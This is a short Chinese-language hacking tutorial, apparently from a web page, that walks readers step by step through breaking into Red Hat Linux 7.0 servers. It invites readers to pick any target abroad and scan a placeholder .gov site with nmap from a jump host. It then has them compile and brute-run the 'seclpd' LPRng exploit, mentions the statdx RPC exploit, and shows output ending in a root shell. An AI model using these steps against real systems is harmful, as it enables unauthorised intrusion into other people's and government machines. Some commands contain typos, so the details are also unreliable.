WINDOWS2000、NT是不是不想“玩”了,快跟我一步步入侵REDHAT LINUX7.0吧!
[一. 确定目标]
日本?台湾?美国?随便你了!
[二.试试他的服务都有些什么]
比如TELNET 或是 FTP等等,你会得到一些系统信息的!
[三.找跳板]
当然也是REDHAT LINUX7.0的了,最好是你自已的,方便嘛!
命令行:
C:\>telnet xxx.xxx.xxx.xxx
登陆上去了吧!
[四.用扫描器看看]
这里我们推荐使用NMAP,因为在UNIX系统中它够爽,输入以下命令:
bash-2.04$(这是系统提示状态) nmap -sT -0 www.xxx.gov(你先前选定的目标)
是不是开了很多端口呀
[五.利用LP(网络打印服务)漏洞入侵]
重点来了!在REDHAT 7.0中有个LP漏洞(其实我们通过上面的扫描结果后也可以试试
RPC漏洞 例如:bash-2.04$ finger @www.xxx.gov 查看用户
bash-2.04$ ./statdx -h 其中statd为rpc.ststd是一个程式需下载
查看系统支持版本
bash-2.04$ stat -d 0 www.xxx.gov 进行溢出)
呵呵,跑题了!
我们需要下载一个SECLPD.C程序,然后将这个程序上传到你的跳板上
用GCC编译一下,输入命令
bash-2.04$ gcc -o seclpd seclpd.c
编译成功后,执行看看命令的使用:
bash-2.04$ ./seclpd
看来就是它了,没有错.开始入侵
输入命令
bash-2.04$ ./seclpd www.xxx.gov -t 0
结果显示失败,在来
bash-2.04$ ./seclpd www.xxx.gov -t 1
又失败,我在来
bash-2.04$ ./seclpd www.xxx.gov brute -t 0 我加BRUTE,暴力,哈哈~
结果不在显示TRY BRUTE FORCE了,是一直想要的RELAX AND ENJOY THE RIDE;>
现在要等它看出不出SHELL,大约五分钟左右,就会有结果出来
- [+] shell located on www.xxx.gov
- [+] enter commands at will
linux xxx.www 2.2.16-22smp #1 smp tue aug 22 17:34:21 edt 2002 i686
unknown
uid=(0)(root) gid=7(lp)
我笑,我大声地笑,我是ROOT了!
【编辑推荐】
